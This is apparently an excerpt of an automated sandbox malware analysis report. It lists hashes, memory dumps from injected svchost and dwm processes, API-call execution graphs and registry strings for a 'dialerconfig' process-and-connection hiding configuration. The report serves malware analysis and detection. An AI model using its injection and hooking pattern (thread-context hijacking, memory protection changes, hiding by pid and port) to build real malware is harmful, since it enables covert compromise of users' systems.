                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction ID: 20f4be22c22dfa457ef3525fbc3f7e3b2bed3974d008a9829f0cdff42773ce01
                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                    • Instruction Fuzzy Hash: 8D112B36218F84C2EB619B15F94039977E5F788B95F684224EE8D1BB69DF3CC952CB00
                                                    Function 00000158709A7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                    • API String ID: 592178966-758928094
                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction ID: 3b3cf7cab3b32b493eb2ba88bbe49323af7bffc66ca1579de9ffd3a8dc560e24
                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                    • Instruction Fuzzy Hash: 13E086B1640F44D0DF018F61EC403D873A0DB9CB68BA89122D95C5A311FE38D5FAC700
                                                    Function 00000158709A73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3045643461.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709a0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: __std_exception_copy
                                                    • String ID: Locator'$riptor at (
                                                    • API String ID: 592178966-4215709766
                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction ID: 8b563b15b0da3dea3b2a42213421ba672c2fb53560027d55dbb8324bba71f4a8
                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                    • Instruction Fuzzy Hash: EDE08671600F44D0DF028F61D8403D87360E79CB68B989122C94C5A311EE38D5E6C700
                                                    Function 00000158709D1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFree
                                                    • String ID:
                                                    • API String ID: 756756679-0
                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction ID: 29c7f6ae37fee443e275d0900ba1dffe24d5f51a1d6125abf64e6308baa90841
                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                    • Instruction Fuzzy Hash: B2118E3A615F48C1EA048B66A8043A977A0E7CDFC2F2840289E8D6B766DE38C852C700
                                                    Function 00000158709D1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002C.00000002.3046293502.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_44_2_158709d0000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1617791916-0
                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction ID: 0df0b71972fc614dcc7a18976dac37df89d2385fd46c5fb6c76c0ed9fa5f8c47
                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                    • Instruction Fuzzy Hash: 24E0653A601A04C6E7058F52DC0838E3AE1FBCDF56F14C014C9090B361DF7D88A6CB50

                                                    Execution Graph

                                                    Execution Coverage:1.6%
                                                    Dynamic/Decrypted Code Coverage:95.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:124
                                                    Total number of Limit Nodes:16
                                                    execution_graph 15071 26db16e1abc 15077 26db16e1628 GetProcessHeap 15071->15077 15073 26db16e1ad2 Sleep SleepEx 15075 26db16e1acb 15073->15075 15075->15073 15076 26db16e1598 StrCmpIW StrCmpW 15075->15076 15122 26db16e18b4 15075->15122 15076->15075 15078 26db16e1648 __std_exception_copy 15077->15078 15139 26db16e1268 GetProcessHeap 15078->15139 15080 26db16e1650 15081 26db16e1268 2 API calls 15080->15081 15082 26db16e1661 15081->15082 15083 26db16e1268 2 API calls 15082->15083 15084 26db16e166a 15083->15084 15085 26db16e1268 2 API calls 15084->15085 15086 26db16e1673 15085->15086 15087 26db16e168e RegOpenKeyExW 15086->15087 15088 26db16e18a6 15087->15088 15089 26db16e16c0 RegOpenKeyExW 15087->15089 15088->15075 15090 26db16e16e9 15089->15090 15091 26db16e16ff RegOpenKeyExW 15089->15091 15150 26db16e12bc RegQueryInfoKeyW 15090->15150 15093 26db16e173a RegOpenKeyExW 15091->15093 15094 26db16e1723 15091->15094 15097 26db16e1775 RegOpenKeyExW 15093->15097 15098 26db16e175e 15093->15098 15143 26db16e104c RegQueryInfoKeyW 15094->15143 15095 26db16e16f5 RegCloseKey 15095->15091 15099 26db16e1799 15097->15099 15100 26db16e17b0 RegOpenKeyExW 15097->15100 15102 26db16e12bc 11 API calls 15098->15102 15103 26db16e12bc 11 API calls 15099->15103 15104 26db16e17eb RegOpenKeyExW 15100->15104 15105 26db16e17d4 15100->15105 15106 26db16e176b RegCloseKey 15102->15106 15107 26db16e17a6 RegCloseKey 15103->15107 15109 26db16e1826 RegOpenKeyExW 15104->15109 15110 26db16e180f 15104->15110 15108 26db16e12bc 11 API calls 15105->15108 15106->15097 15107->15100 15111 26db16e17e1 RegCloseKey 15108->15111 15113 26db16e184a 15109->15113 15114 26db16e1861 RegOpenKeyExW 15109->15114 15112 26db16e104c 4 API calls 15110->15112 15111->15104 15117 26db16e181c RegCloseKey 15112->15117 15118 26db16e104c 4 API calls 15113->15118 15115 26db16e189c RegCloseKey 15114->15115 15116 26db16e1885 15114->15116 15115->15088 15119 26db16e104c 4 API calls 15116->15119 15117->15109 15120 26db16e1857 RegCloseKey 15118->15120 15121 26db16e1892 RegCloseKey 15119->15121 15120->15114 15121->15115 15168 26db16e14a4 15122->15168 15161 26db16f6168 15139->15161 15142 26db16e12ae __std_exception_copy 15142->15080 15144 26db16e11b5 RegCloseKey 15143->15144 15145 26db16e10bf 15143->15145 15144->15093 15145->15144 15146 26db16e10cf RegEnumValueW 15145->15146 15148 26db16e1125 __std_exception_copy __free_lconv_num 15146->15148 15147 26db16e114e GetProcessHeap 15147->15148 15148->15144 15148->15146 15148->15147 15149 26db16e116e GetProcessHeap 15148->15149 15149->15148 15151 26db16e1327 GetProcessHeap 15150->15151 15155 26db16e148a __free_lconv_num 15150->15155 15152 26db16e133e __std_exception_copy __free_lconv_num 15151->15152 15153 26db16e1476 GetProcessHeap 15152->15153 15154 26db16e1352 RegEnumValueW 15152->15154 15157 26db16e13d3 GetProcessHeap 15152->15157 15158 26db16e141e lstrlenW GetProcessHeap 15152->15158 15159 26db16e13f3 GetProcessHeap 15152->15159 15160 26db16e1443 StrCpyW 15152->15160 15163 26db16e152c 15152->15163 15153->15155 15154->15152 15155->15095 15157->15152 15158->15152 15159->15152 15160->15152 15162 26db16e1283 GetProcessHeap 15161->15162 15162->15142 15164 26db16e1546 15163->15164 15167 26db16e157c 15163->15167 15165 26db16e1565 StrCmpW 15164->15165 15166 26db16e155d StrCmpIW 15164->15166 15164->15167 15165->15164 15166->15164 15167->15152 15169 26db16e14e1 GetProcessHeap 15168->15169 15170 26db16e14c1 GetProcessHeap 15168->15170 15174 26db16f6180 15169->15174 15171 26db16e14da __free_lconv_num 15170->15171 15171->15169 15171->15170 15175 26db16e14f6 GetProcessHeap HeapFree 15174->15175 15176 26db16e3ab9 15177 26db16e3a06 15176->15177 15178 26db16e3a56 VirtualQuery 15177->15178 15179 26db16e3a70 15177->15179 15180 26db16e3a8a VirtualAlloc 15177->15180 15178->15177 15178->15179 15180->15179 15181 26db16e3abb GetLastError 15180->15181 15181->15177 15181->15179 15182 26db16b273c 15183 26db16b276a 15182->15183 15184 26db16b27c5 VirtualAlloc 15183->15184 15187 26db16b28d4 15183->15187 15186 26db16b27ec 15184->15186 15184->15187 15185 26db16b2858 LoadLibraryA 15185->15186 15186->15185 15186->15187 15188 26db16e28c8 15190 26db16e290e 15188->15190 15189 26db16e2970 15190->15189 15192 26db16e3844 15190->15192 15193 26db16e3866 15192->15193 15194 26db16e3851 StrCmpNIW 15192->15194 15193->15190 15194->15193 15195 26db16e5cf0 15196 26db16e5cfd 15195->15196 15197 26db16e5d09 15196->15197 15203 26db16e5e1a 15196->15203 15198 26db16e5d3e 15197->15198 15199 26db16e5d8d 15197->15199 15200 26db16e5d66 SetThreadContext 15198->15200 15200->15199 15201 26db16e5e41 VirtualProtect FlushInstructionCache 15201->15203 15202 26db16e5efe 15204 26db16e5f1e 15202->15204 15215 26db16e43e0 15202->15215 15203->15201 15203->15202 15211 26db16e4df0 GetCurrentProcess 15204->15211 15207 26db16e5f23 15208 26db16e5f37 ResumeThread 15207->15208 15210 26db16e5f77 _log10_special 15207->15210 15209 26db16e5f6b 15208->15209 15209->15207 15214 26db16e4e0c 15211->15214 15212 26db16e4e53 15212->15207 15213 26db16e4e22 VirtualProtect FlushInstructionCache 15213->15214 15214->15212 15214->15213 15216 26db16e43fc 15215->15216 15217 26db16e445f 15216->15217 15218 26db16e4412 VirtualFree 15216->15218 15217->15204 15218->15216 15219 26db16e554d 15221 26db16e5554 15219->15221 15220 26db16e55bb 15221->15220 15222 26db16e5637 VirtualProtect 15221->15222 15223 26db16e5663 GetLastError 15222->15223 15224 26db16e5671 15222->15224 15223->15224

                                                    Executed Functions

                                                    Function 0000026DB16E1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                    • API String ID: 106492572-2879589442
                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction ID: caf06e3a7ae408ade61c96a01db05032c2946f9c689eeef9a33856c142e71715
                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                    • Instruction Fuzzy Hash: 74711A36B10A58D6EB109F65EC58A9923B4F794B8CF422211DE4E87B6CDF36C444D784
                                                    Function 0000026DB16E3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                    • String ID: wr
                                                    • API String ID: 1092925422-2678910430
                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction ID: c1b776f1f171d88329335a376e3a54bbe2177aecc22c5f7f5ced1c15b629d782
                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                    • Instruction Fuzzy Hash: AE115B36B04B4982EF149B25E80C66A73B0FB88B89F560129DE8907798EF3EC645C744
                                                    Function 0000026DB16E5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 59 26db16e5b30-26db16e5b57 60 26db16e5b6b-26db16e5b76 GetCurrentThreadId 59->60 61 26db16e5b59-26db16e5b68 59->61 62 26db16e5b78-26db16e5b7d 60->62 63 26db16e5b82-26db16e5b89 60->63 61->60 64 26db16e5faf-26db16e5fc6 call 26db16e7940 62->64 65 26db16e5b9b-26db16e5baf 63->65 66 26db16e5b8b-26db16e5b96 call 26db16e5960 63->66 67 26db16e5bbe-26db16e5bc4 65->67 66->64 70 26db16e5bca-26db16e5bd3 67->70 71 26db16e5c95-26db16e5cb6 67->71 75 26db16e5c1a-26db16e5c8d call 26db16e4510 call 26db16e44b0 call 26db16e4470 70->75 76 26db16e5bd5-26db16e5c18 call 26db16e85c0 70->76 78 26db16e5cbc-26db16e5cdc GetThreadContext 71->78 79 26db16e5e1f-26db16e5e30 call 26db16e74bf 71->79 86 26db16e5c90 75->86 76->86 82 26db16e5e1a 78->82 83 26db16e5ce2-26db16e5d03 78->83 90 26db16e5e35-26db16e5e3b 79->90 82->79 83->82 92 26db16e5d09-26db16e5d12 83->92 86->67 94 26db16e5e41-26db16e5e98 VirtualProtect FlushInstructionCache 90->94 95 26db16e5efe-26db16e5f0e 90->95 97 26db16e5d14-26db16e5d25 92->97 98 26db16e5d92-26db16e5da3 92->98 101 26db16e5ec9-26db16e5ef9 call 26db16e78ac 94->101 102 26db16e5e9a-26db16e5ea4 94->102 105 26db16e5f10-26db16e5f17 95->105 106 26db16e5f1e-26db16e5f2a call 26db16e4df0 95->106 99 26db16e5d27-26db16e5d3c 97->99 100 26db16e5d8d 97->100 103 26db16e5e15 98->103 104 26db16e5da5-26db16e5dc3 98->104 99->100 108 26db16e5d3e-26db16e5d88 call 26db16e3970 SetThreadContext 99->108 100->103 101->90 102->101 109 26db16e5ea6-26db16e5ec1 call 26db16e4390 102->109 104->103 111 26db16e5dc5-26db16e5e0c call 26db16e3900 104->111 105->106 112 26db16e5f19 call 26db16e43e0 105->112 120 26db16e5f2f-26db16e5f35 106->120 108->100 109->101 111->103 126 26db16e5e10 call 26db16e74dd 111->126 112->106 124 26db16e5f77-26db16e5f95 120->124 125 26db16e5f37-26db16e5f75 ResumeThread call 26db16e78ac 120->125 128 26db16e5fa9 124->128 129 26db16e5f97-26db16e5fa6 124->129 125->120 126->103 128->64 129->128
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Thread$Current$Context
                                                    • String ID:
                                                    • API String ID: 1666949209-0
                                                    • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                    • Instruction ID: e55c7541e7d7c01b9be2990fd0903ff26b56a147aad62ace7f121fcecd3d64cb
                                                    • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                    • Instruction Fuzzy Hash: 3FD1B877715B88C1DA709B0AE89835A77A0F388B88F514216EACD47BADDF7DC541CB40
                                                    Function 0000026DB16E50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 131 26db16e50d0-26db16e50fc 132 26db16e510d-26db16e5116 131->132 133 26db16e50fe-26db16e5106 131->133 134 26db16e5127-26db16e5130 132->134 135 26db16e5118-26db16e5120 132->135 133->132 136 26db16e5141-26db16e514a 134->136 137 26db16e5132-26db16e513a 134->137 135->134 138 26db16e514c-26db16e5151 136->138 139 26db16e5156-26db16e5161 GetCurrentThreadId 136->139 137->136 140 26db16e56d3-26db16e56da 138->140 141 26db16e5163-26db16e5168 139->141 142 26db16e516d-26db16e5174 139->142 141->140 143 26db16e5176-26db16e517c 142->143 144 26db16e5181-26db16e518a 142->144 143->140 145 26db16e518c-26db16e5191 144->145 146 26db16e5196-26db16e51a2 144->146 145->140 147 26db16e51a4-26db16e51c9 146->147 148 26db16e51ce-26db16e5225 call 26db16e56e0 * 2 146->148 147->140 153 26db16e523a-26db16e5243 148->153 154 26db16e5227-26db16e522e 148->154 157 26db16e5255-26db16e525e 153->157 158 26db16e5245-26db16e5252 153->158 155 26db16e5236 154->155 156 26db16e5230 154->156 155->153 160 26db16e52a6-26db16e52aa 155->160 159 26db16e52b0-26db16e52b6 156->159 161 26db16e5273-26db16e5298 call 26db16e7870 157->161 162 26db16e5260-26db16e5270 157->162 158->157 164 26db16e52b8-26db16e52d4 call 26db16e4390 159->164 165 26db16e52e5-26db16e52eb 159->165 160->159 170 26db16e532d-26db16e5342 call 26db16e3cc0 161->170 171 26db16e529e 161->171 162->161 164->165 175 26db16e52d6-26db16e52de 164->175 167 26db16e5315-26db16e5328 165->167 168 26db16e52ed-26db16e530c call 26db16e78ac 165->168 167->140 168->167 178 26db16e5344-26db16e534c 170->178 179 26db16e5351-26db16e535a 170->179 171->160 175->165 178->160 180 26db16e536c-26db16e53ba call 26db16e8c60 179->180 181 26db16e535c-26db16e5369 179->181 184 26db16e53c2-26db16e53ca 180->184 181->180 185 26db16e54d7-26db16e54df 184->185 186 26db16e53d0-26db16e54bb call 26db16e7440 184->186 187 26db16e5523-26db16e552b 185->187 188 26db16e54e1-26db16e54f4 call 26db16e4590 185->188 198 26db16e54bf-26db16e54ce call 26db16e4060 186->198 199 26db16e54bd 186->199 191 26db16e5537-26db16e5546 187->191 192 26db16e552d-26db16e5535 187->192 202 26db16e54f8-26db16e5521 188->202 203 26db16e54f6 188->203 196 26db16e5548 191->196 197 26db16e554f 191->197 192->191 195 26db16e5554-26db16e5561 192->195 200 26db16e5563 195->200 201 26db16e5564-26db16e55b9 call 26db16e85c0 195->201 196->197 197->195 207 26db16e54d2 198->207 208 26db16e54d0 198->208 199->185 200->201 210 26db16e55bb-26db16e55c3 201->210 211 26db16e55c8-26db16e5661 call 26db16e4510 call 26db16e4470 VirtualProtect 201->211 202->185 203->187 207->184 208->185 216 26db16e5663-26db16e5668 GetLastError 211->216 217 26db16e5671-26db16e56d1 211->217 216->217 217->140
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID:
                                                    • API String ID: 2882836952-0
                                                    • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                    • Instruction ID: cfc79b96a5dd46a204b3d5188f1049b40703d56b0f44985e16ab108cabda03a3
                                                    • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                    • Instruction Fuzzy Hash: 8502C637A19B8886E760CB55E89835AB7A0F3C5788F514115EA8E87BACDB7DC484CB40
                                                    Function 0000026DB16E39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocQuery
                                                    • String ID:
                                                    • API String ID: 31662377-0
                                                    • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                    • Instruction ID: 0304771774ab67e0485e26c6c9f772f1dd4a43ec4c2198e8b4c210690502c9cd
                                                    • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                    • Instruction Fuzzy Hash: A2311733F19A8881EB30DB19E85935E66A4F38478CF910615F9CD4679CDF7EC6908B84
                                                    Function 0000026DB16E328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                    • String ID:
                                                    • API String ID: 1683269324-0
                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction ID: 0d4b71f337af7754d2011275c9627001d759e6898a4a482cf8597ea20c60ca1f
                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                    • Instruction Fuzzy Hash: A3118433F1078DC2FB609B21FD4DB692294BB5434CFD2532899068269DEF7BC28886C0
                                                    Function 0000026DB16E4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                    • String ID:
                                                    • API String ID: 3733156554-0
                                                    • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                    • Instruction ID: 015026c3bf2b5c4532f2cfc69d2c2b2bbcf9a5b0dcf6ffe626aa708de24468aa
                                                    • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                    • Instruction Fuzzy Hash: 6BF03037B19B08C0D630DB11E84934A6BA0F3887D8F550215FA8D43B6DCE3EC6808B80
                                                    Function 0000026DB16B273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 265 26db16b273c-26db16b27a4 call 26db16b29d4 * 4 274 26db16b27aa-26db16b27ad 265->274 275 26db16b29b2 265->275 274->275 277 26db16b27b3-26db16b27b6 274->277 276 26db16b29b4-26db16b29d0 275->276 277->275 278 26db16b27bc-26db16b27bf 277->278 278->275 279 26db16b27c5-26db16b27e6 VirtualAlloc 278->279 279->275 280 26db16b27ec-26db16b280c 279->280 281 26db16b2838-26db16b283f 280->281 282 26db16b280e-26db16b2836 280->282 283 26db16b2845-26db16b2852 281->283 284 26db16b28df-26db16b28e6 281->284 282->281 282->282 283->284 287 26db16b2858-26db16b286a LoadLibraryA 283->287 285 26db16b28ec-26db16b2901 284->285 286 26db16b2992-26db16b29b0 284->286 285->286 288 26db16b2907 285->288 286->276 289 26db16b286c-26db16b2878 287->289 290 26db16b28ca-26db16b28d2 287->290 293 26db16b290d-26db16b2921 288->293 294 26db16b28c5-26db16b28c8 289->294 290->287 291 26db16b28d4-26db16b28d9 290->291 291->284 295 26db16b2923-26db16b2934 293->295 296 26db16b2982-26db16b298c 293->296 294->290 297 26db16b287a-26db16b287d 294->297 299 26db16b2936-26db16b293d 295->299 300 26db16b293f-26db16b2943 295->300 296->286 296->293 301 26db16b28a7-26db16b28b7 297->301 302 26db16b287f-26db16b28a5 297->302 303 26db16b2970-26db16b2980 299->303 304 26db16b2945-26db16b294b 300->304 305 26db16b294d-26db16b2951 300->305 306 26db16b28ba-26db16b28c1 301->306 302->306 303->295 303->296 304->303 307 26db16b2963-26db16b2967 305->307 308 26db16b2953-26db16b2961 305->308 306->294 307->303 310 26db16b2969-26db16b296c 307->310 308->303 310->303
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091701858.0000026DB16B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16B0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16b0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: AllocLibraryLoadVirtual
                                                    • String ID:
                                                    • API String ID: 3550616410-0
                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction ID: 793f1997d1bf98c9e799aefee3001344c6f2adf3721dc400c8ac83eb1d55b70a
                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                    • Instruction Fuzzy Hash: D0610332F0169887EB549F16980972E73D2F754BD8F1A8129DE5D0778CDA39E853C780
                                                    Function 0000026DB16E1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0000026DB16E1628: GetProcessHeap.KERNEL32 ref: 0000026DB16E1633
                                                      • Part of subcall function 0000026DB16E1628: HeapAlloc.KERNEL32 ref: 0000026DB16E1642
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E16B2
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E16DF
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E16F9
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E1719
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E1734
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E1754
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E176F
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E178F
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E17AA
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E17CA
                                                    • Sleep.KERNEL32 ref: 0000026DB16E1AD7
                                                    • SleepEx.KERNELBASE ref: 0000026DB16E1ADD
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E17E5
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E1805
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E1820
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E1840
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E185B
                                                      • Part of subcall function 0000026DB16E1628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16E187B
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E1896
                                                      • Part of subcall function 0000026DB16E1628: RegCloseKey.ADVAPI32 ref: 0000026DB16E18A0
                                                    Memory Dump Source
                                                    • Source File: 0000002D.00000002.3091758684.0000026DB16E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB16E0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_45_2_26db16e0000_dwm.jbxd
                                                    Similarity
                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                    • String ID:
                                                    • API String ID: 1534210851-0
                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction ID: 86358c34b40a77f40c8559aba54143cd72c6b39e9b7ecb166de91e35927be6eb
                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                    • Instruction Fuzzy Hash: A0312373F10649C1FF509B26DE593A913A4BB54BCCF4A56218E09872DDFF12C491E290

